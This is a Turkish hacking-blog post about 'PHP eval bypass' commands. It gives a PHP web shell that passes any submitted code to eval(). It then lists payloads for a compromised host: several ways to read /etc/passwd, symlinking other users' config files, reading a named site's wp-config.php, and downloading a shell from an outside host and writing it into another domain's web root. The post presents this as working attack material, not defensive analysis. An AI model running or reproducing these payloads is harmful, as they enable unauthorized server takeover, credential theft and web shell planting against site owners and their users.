PHP Eval Bypass Komutları PHP Eval Bypass Komutları PHP Eval Bypass Komutları PHP Eval Bypass Komutları - Scorpiol

PHP Eval Bypass Komutları


PHP EVAL SCİRPT (eval.php);


<?php
echo "<center><a href='?id=eval'>EvaL TIKLA</a></center>";
// PHP Eval komut bölümü
if ($_GET[id]=="eval"){
 $code=stripslashes($_POST['code']);
 echo '<center><br><h3> Eval PHP</h3></center>
 <center>
 <form method="POST" action="">
 <input type="hidden" name="id" value="eval">
 <textarea name ="code" rows="10" cols="85" class="textarea">',$code,'
Kodlar buraya gelsin..
</textarea><br><br>
 <input type="submit" value=" Evaluate PHP Code" class="button"><hr>
 </form>
 <textarea rows="10" cols="85" class="textarea">';
 eval($code);
 echo '</textarea><br><br>';
}
?>


BAZI EVAL METHODLARI:
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "file:file:///etc/passwd");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
$hedef = '/home/scorp/public_html/config.php';
$bað = '/home/scor/public_html/sym/config.ini';
symlink($hedef, $bað);
echo(readlink($bað));
$output = shell_exec('cat /etc/passwd > passwd.txt');
$output = shell_exec('ls /var/mail > users.txt');
$users=file("/etc/passwd");
foreach($users as $user)
{
$str=explode(":",$user);
echo $str[0]."n";
}
echo $_SERVER["DOCUMENT_ROOT"];
echo file_get_contents('/etc/passwd'); 
$dosya = file_get_contents("/var/www/vhosts/eternal.scorpiol.edu.tr/httpdocs/wp-config.php");
echo $dosya;
$shell = file_get_contents("www.uygunfiyatlioteller.com/scor.txt");
touch("/var/www/vhosts/oveclermedikal.com/httpdocs/scorp.php");
$dosya = fopen("/var/www/vhosts/oveclermedikal.com/httpdocs/scorp.php","w");
fwrite($dosya,$shell);
readfile("/etc/passwd");
echo file_get_contents("/etc/passwd");
passthru("ln -s /etc/passwd passwd.txt");

0 Yorumlar

Yorum Gönder

Yorum Gönder (0)

Daha yeni Daha eski
Oxygen Chrome
xenforo eklentileri manuel sql injection hacker blog Sunucu Optimizasyon